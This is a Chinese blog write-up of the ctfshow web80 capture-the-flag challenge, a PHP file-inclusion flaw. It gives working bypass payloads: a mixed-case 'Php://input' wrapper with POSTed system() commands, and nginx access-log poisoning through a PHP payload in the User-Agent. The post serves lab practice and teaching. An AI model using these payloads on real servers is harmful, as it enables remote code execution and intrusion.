[ctfshow web入门] web80

一口一个橘子2025-05-31 16:46

信息收集

过滤了phpdata

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码 
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

日志绕过

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
提子拌饭1332 分钟前
个人月事记录表应用 - 鸿蒙PC Electron框架完整实现指南
前端·javascript·华为·electron·前端框架·开源·鸿蒙系统
YHL10 分钟前
📚 JS执行机制(执行上下文 + 调用栈 + 编译流程)
前端·javascript
不简说16 分钟前
这次真香!sv-print 可视化打印设计器更新:插件脚手架、Excel 导出、弹窗 API 三连发
前端·javascript·前端框架
无聊的老谢20 分钟前
Web GIS 最佳实践:Vue 集成 Leaflet/OpenLayers 实现基站海量点位渲染
前端·javascript·vue.js
yingyima24 分钟前
GCP Cloud Scheduler 核心语法与实战示例速查手册
前端
用户573501072520624 分钟前
Elpis 项目阶段性总结 - 基于 vue3 完成领域模型架构建设
前端
假如让我当三天老蒯31 分钟前
为什么 setData 能获取到 prev 参数?(自学用)
前端·react.js
AskHarries43 分钟前
Workspace:文件系统、项目上下文和执行边界
java·服务器·前端
humors2211 小时前
四种字母密码表示法
安全·网络安全·密码学
Aphasia3111 小时前
从内存模型看深浅拷贝
前端·javascript·面试
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04Codex 下载安装指南:Windows 和 macOS 官方版下载05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06CC-Switch 下载、安装与使用配置指南【2026.5.29】07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法